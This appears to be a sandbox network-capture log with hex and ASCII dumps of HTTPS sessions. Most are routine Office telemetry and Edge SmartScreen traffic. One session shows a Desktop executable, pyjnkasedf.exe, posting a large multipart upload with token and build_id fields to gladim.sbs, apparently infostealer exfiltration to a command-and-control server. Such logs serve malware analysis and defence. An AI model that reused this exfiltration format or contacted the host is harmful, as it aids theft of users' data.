                                                                                                                                                                                                                                                      x-azure-ref: 20241130T213847Z-174f7845968xr5c2hC1EWRd0hn0000000kxg0000000042r6
                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                      2024-11-30 21:38:47 UTC3342INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 31 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 4f 53 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49
                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120601" V="3" DC="SM" EN="Office.System.SystemHealthMetadataOS" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC" xmlns=""> <RI


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                      123192.168.2.104988913.107.246.63443
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-11-30 21:38:47 UTC193OUTGET /rules/rule120602v10s19.xml HTTP/1.1
                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                      2024-11-30 21:38:47 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Date: Sat, 30 Nov 2024 21:38:47 GMT
                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                      Content-Length: 2592
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                                                                                                                                                                      ETag: "0x8DC582BB5B890DB"
                                                                                                                                                                                                                                                      x-ms-request-id: 205353cd-201e-006e-0bb2-42bbe3000000
                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                      x-azure-ref: 20241130T213847Z-174f7845968swgbqhC1EWRmnb4000000123g00000000dc1d
                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                      2024-11-30 21:38:47 UTC2592INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 32 22 20 56 3d 22 31 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 41 70 70 6c 69 63 61 74 69 6f 6e 41 6e 64 4c 61 6e 67 75 61 67 65 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d
                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120602" V="10" DC="SM" EN="Office.System.SystemHealthMetadataApplicationAndLanguage" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa=


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                      124192.168.2.1049893104.40.82.1824432116C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-11-30 21:38:47 UTC698OUTPOST /api/browser/edge/data/settings/3 HTTP/1.1
                                                                                                                                                                                                                                                      Host: data-edge.smartscreen.microsoft.com
                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                      Content-Length: 725
                                                                                                                                                                                                                                                      Accept: application/octet-stream;application/x-patch-bsdiff;
                                                                                                                                                                                                                                                      Authorization: SmartScreenHash eyJhdXRoSWQiOiI0MWE0MzhiYy0xMjQ5LTQzZDMtYTI2ZC02OWNkNjJjMDgzMTciLCAia2V5IjoiOEtNWEdVSnVKVEZPWkx0eWpYTGs0UT09IiwgImhhc2giOiJsUU5EMnk5N05wRT0ifQ==
                                                                                                                                                                                                                                                      Content-Type: application/json; charset=utf-8
                                                                                                                                                                                                                                                      If-None-Match: "2.0-0"
                                                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                      2024-11-30 21:38:47 UTC725OUTData Raw: 7b 22 69 64 65 6e 74 69 74 79 22 3a 7b 22 75 73 65 72 22 3a 7b 22 6c 6f 63 61 6c 65 22 3a 22 65 6e 2d 47 42 22 7d 2c 22 64 65 76 69 63 65 22 3a 7b 22 69 64 22 3a 6e 75 6c 6c 2c 22 63 75 73 74 6f 6d 49 64 22 3a 6e 75 6c 6c 2c 22 6f 6e 6c 69 6e 65 49 64 54 69 63 6b 65 74 22 3a 6e 75 6c 6c 2c 22 66 61 6d 69 6c 79 22 3a 33 2c 22 6c 6f 63 61 6c 65 22 3a 22 65 6e 2d 47 42 22 2c 22 6f 73 56 65 72 73 69 6f 6e 22 3a 22 31 30 2e 30 2e 31 39 30 34 35 2e 32 30 30 36 2e 76 62 5f 72 65 6c 65 61 73 65 22 2c 22 62 72 6f 77 73 65 72 22 3a 7b 22 69 6e 74 65 72 6e 65 74 5f 65 78 70 6c 6f 72 65 72 22 3a 22 39 2e 31 31 2e 31 39 30 34 31 2e 30 22 7d 2c 22 6e 65 74 4a 6f 69 6e 53 74 61 74 75 73 22 3a 32 2c 22 65 6e 74 65 72 70 72 69 73 65 22 3a 7b 7d 2c 22 63 6c 6f 75 64 53 6b
                                                                                                                                                                                                                                                      Data Ascii: {"identity":{"user":{"locale":"en-GB"},"device":{"id":null,"customId":null,"onlineIdTicket":null,"family":3,"locale":"en-GB","osVersion":"10.0.19045.2006.vb_release","browser":{"internet_explorer":"9.11.19041.0"},"netJoinStatus":2,"enterprise":{},"cloudSk
                                                                                                                                                                                                                                                      2024-11-30 21:38:48 UTC302INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Date: Sat, 30 Nov 2024 21:38:47 GMT
                                                                                                                                                                                                                                                      Content-Type: application/octet-stream
                                                                                                                                                                                                                                                      Content-Length: 130439
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      Server: Kestrel
                                                                                                                                                                                                                                                      ETag: "2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1"
                                                                                                                                                                                                                                                      Request-Context: appId=cid-v1:3d5e3eff-de07-43c3-a15d-06b05ff513c8
                                                                                                                                                                                                                                                      2024-11-30 21:38:48 UTC16082INData Raw: 7b 0d 0a 20 20 22 67 65 6f 69 64 4d 61 70 73 22 3a 20 7b 0d 0a 20 20 20 20 22 61 75 22 3a 20 22 68 74 74 70 73 3a 2f 2f 61 75 73 74 72 61 6c 69 61 2e 73 6d 61 72 74 73 63 72 65 65 6e 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 22 2c 0d 0a 20 20 20 20 22 63 68 22 3a 20 22 68 74 74 70 73 3a 2f 2f 73 77 69 74 7a 65 72 6c 61 6e 64 2e 73 6d 61 72 74 73 63 72 65 65 6e 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 22 2c 0d 0a 20 20 20 20 22 65 75 22 3a 20 22 68 74 74 70 73 3a 2f 2f 65 75 72 6f 70 65 2e 73 6d 61 72 74 73 63 72 65 65 6e 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 22 2c 0d 0a 20 20 20 20 22 66 66 6c 34 22 3a 20 22 68 74 74 70 73 3a 2f 2f 75 6e 69 74 65 64 73 74 61 74 65 73 31 2e 73 73 2e 77 64 2e 6d 69 63 72 6f 73 6f 66 74 2e 75 73 2f 22 2c 0d 0a
                                                                                                                                                                                                                                                      Data Ascii: { "geoidMaps": { "au": "https://australia.smartscreen.microsoft.com/", "ch": "https://switzerland.smartscreen.microsoft.com/", "eu": "https://europe.smartscreen.microsoft.com/", "ffl4": "https://unitedstates1.ss.wd.microsoft.us/",
                                                                                                                                                                                                                                                      2024-11-30 21:38:48 UTC16384INData Raw: 20 20 20 20 20 20 20 20 20 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6b 65 79 22 3a 20 22 30 39 63 34 37 36 32 37 62 63 35 33 33 62 35 39 32 34 61 30 35 35 61 30 34 62 63 34 63 33 33 65 22 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 76 61 6c 75 65 22 3a 20 39 2e 35 38 33 34 34 30 31 37 37 34 34 37 38 34 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6b 65 79 22 3a 20 22 65 36 33 34 65 62 32 30 64 62 35 30 38 65 33 61 33 31 62 36 31 34 38 31 61 32 35 31 62 66 39 33 22 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 76 61 6c 75 65 22 3a 20 2d 30 2e 33 33 37 30 36 38 35 39 32 37 38 32 37 33 35 0d 0a 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                                                      Data Ascii: { "key": "09c47627bc533b5924a055a04bc4c33e", "value": 9.58344017744784 }, { "key": "e634eb20db508e3a31b61481a251bf93", "value": -0.337068592782735
                                                                                                                                                                                                                                                      2024-11-30 21:38:48 UTC16384INData Raw: 30 37 37 37 34 37 33 33 30 39 35 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6b 65 79 22 3a 20 22 31 32 62 62 65 66 63 30 35 64 35 31 34 32 65 37 65 62 36 38 36 66 61 64 38 64 65 61 39 32 31 31 22 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 76 61 6c 75 65 22 3a 20 2d 31 2e 30 35 37 31 37 37 35 33 31 31 38 30 39 34 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6b 65 79 22 3a 20 22 63 65 35 66 62 38 64 66 31 32 35 61 34 37 32 31 64 31 64 66 33 32 38 62 63 36 66 32 64 64 65 61 22 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 76 61 6c 75 65 22 3a
                                                                                                                                                                                                                                                      Data Ascii: 07774733095 }, { "key": "12bbefc05d5142e7eb686fad8dea9211", "value": -1.05717753118094 }, { "key": "ce5fb8df125a4721d1df328bc6f2ddea", "value":
                                                                                                                                                                                                                                                      2024-11-30 21:38:48 UTC16384INData Raw: 20 2d 31 2e 39 30 31 33 34 36 37 39 37 33 36 34 32 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6b 65 79 22 3a 20 22 66 32 33 35 64 63 66 36 62 34 32 39 62 61 34 31 36 64 63 65 37 34 64 34 62 36 66 62 63 34 37 62 22 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 76 61 6c 75 65 22 3a 20 31 2e 32 36 30 31 38 31 31 38 35 36 30 38 38 34 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6b 65 79 22 3a 20 22 63 38 66 31 37 64 37 34 30 33 61 63 35 66 66 32 38 39 36 61 37 31 33 61 37 31 37 35 65 64 31 39 22 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 76 61
                                                                                                                                                                                                                                                      Data Ascii: -1.9013467973642 }, { "key": "f235dcf6b429ba416dce74d4b6fbc47b", "value": 1.26018118560884 }, { "key": "c8f17d7403ac5ff2896a713a7175ed19", "va
                                                                                                                                                                                                                                                      2024-11-30 21:38:48 UTC16384INData Raw: 36 62 64 32 65 65 33 36 63 30 33 66 36 66 22 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 76 61 6c 75 65 22 3a 20 35 2e 38 35 39 38 36 34 33 39 33 34 36 35 37 36 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6b 65 79 22 3a 20 22 65 66 64 32 61 66 36 30 63 38 35 30 31 39 33 31 63 62 39 63 37 33 36 62 35 61 64 37 34 66 36 35 22 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 76 61 6c 75 65 22 3a 20 33 2e 39 35 36 39 39 35 33 35 33 36 34 30 30 33 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6b 65 79 22 3a 20 22 32 63 38 34 38 35 34 38 64 34 36 30 63
                                                                                                                                                                                                                                                      Data Ascii: 6bd2ee36c03f6f", "value": 5.85986439346576 }, { "key": "efd2af60c8501931cb9c736b5ad74f65", "value": 3.95699535364003 }, { "key": "2c848548d460c
                                                                                                                                                                                                                                                      2024-11-30 21:38:48 UTC16384INData Raw: 20 22 6b 65 79 22 3a 20 22 65 31 36 38 36 30 37 38 64 31 62 36 30 64 33 35 31 64 61 35 61 38 37 35 34 33 61 32 61 36 36 33 22 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 76 61 6c 75 65 22 3a 20 37 2e 35 30 36 36 35 35 32 34 32 36 32 35 35 31 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6b 65 79 22 3a 20 22 33 61 33 34 31 37 66 35 66 32 30 61 30 33 61 39 38 39 37 33 36 38 39 38 38 37 66 62 37 32 61 32 22 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 76 61 6c 75 65 22 3a 20 2d 31 2e 37 34 39 32 32 35 31 37 36 34 32 37 39 34 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7b 0d 0a 20 20 20 20 20 20 20
                                                                                                                                                                                                                                                      Data Ascii: "key": "e1686078d1b60d351da5a87543a2a663", "value": 7.50665524262551 }, { "key": "3a3417f5f20a03a98973689887fb72a2", "value": -1.74922517642794 }, {
                                                                                                                                                                                                                                                      2024-11-30 21:38:48 UTC16384INData Raw: 20 20 20 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6b 65 79 22 3a 20 22 62 30 64 61 32 37 35 35 32 30 39 31 38 65 32 33 64 64 36 31 35 65 32 61 37 34 37 35 32 38 66 31 22 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 76 61 6c 75 65 22 3a 20 2d 30 2e 39 37 36 31 34 30 37 39 32 39 31 35 33 37 33 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6b 65 79 22 3a 20 22 63 66 61 62 31 62 61 38 63 36 37 63 37 63 38 33 38 64 62 39 38 64 36 36 36 66 30 32 61 31 33 32 22 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 76 61 6c 75 65 22 3a 20 2d 31 2e 31 31 37 38 37 35 38 36 30 34 35 30 39 34 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0d 0a
                                                                                                                                                                                                                                                      Data Ascii: { "key": "b0da275520918e23dd615e2a747528f1", "value": -0.976140792915373 }, { "key": "cfab1ba8c67c7c838db98d666f02a132", "value": -1.11787586045094 },
                                                                                                                                                                                                                                                      2024-11-30 21:38:48 UTC16053INData Raw: 20 20 20 20 20 20 7d 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6b 65 79 22 3a 20 22 64 65 39 35 62 34 33 62 63 65 65 62 34 62 39 39 38 61 65 64 34 61 65 64 35 63 65 66 31 61 65 37 22 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 76 61 6c 75 65 22 3a 20 2d 31 2e 30 33 33 31 39 35 35 36 37 30 31 31 37 37 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6b 65 79 22 3a 20 22 61 64 64 65 63 34 32 36 39 33 32 65 37 31 33 32 33 37 30 30 61 66 61 31 39 31 31 66 38 66 31 63 22 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 76 61 6c 75 65 22 3a 20 30 2e 31 36 30 39 38 34 33 32 38 39 38 35 39 32 34 0d
                                                                                                                                                                                                                                                      Data Ascii: }, { "key": "de95b43bceeb4b998aed4aed5cef1ae7", "value": -1.03319556701177 }, { "key": "addec426932e71323700afa1911f8f1c", "value": 0.160984328985924


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                      125192.168.2.104989594.130.210.714437496C:\Users\user\Desktop\pyjnkasedf.exe
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-11-30 21:38:48 UTC320OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----CBAFCAKEHDHDHIDHDGDH
                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
                                                                                                                                                                                                                                                      Host: gladim.sbs
                                                                                                                                                                                                                                                      Content-Length: 393697
                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                      2024-11-30 21:38:48 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 43 42 41 46 43 41 4b 45 48 44 48 44 48 49 44 48 44 47 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 35 31 64 61 39 61 65 61 38 30 61 37 38 33 35 61 64 65 33 31 37 64 37 66 65 38 61 63 61 35 35 0d 0a 2d 2d 2d 2d 2d 2d 43 42 41 46 43 41 4b 45 48 44 48 44 48 49 44 48 44 47 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 35 65 30 30 61 61 35 30 32 65 37 39 61 35 62 36 63 35 34 62 66 63 36 61 33 32 33 31 61 33 62 35 0d 0a 2d 2d 2d 2d 2d 2d 43 42 41 46 43 41 4b 45 48 44 48 44 48 49 44 48 44 47 44 48 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                      Data Ascii: ------CBAFCAKEHDHDHIDHDGDHContent-Disposition: form-data; name="token"851da9aea80a7835ade317d7fe8aca55------CBAFCAKEHDHDHIDHDGDHContent-Disposition: form-data; name="build_id"5e00aa502e79a5b6c54bfc6a3231a3b5------CBAFCAKEHDHDHIDHDGDHCont
                                                                                                                                                                                                                                                      2024-11-30 21:38:48 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                      2024-11-30 21:38:48 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                      2024-11-30 21:38:48 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                      2024-11-30 21:38:48 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
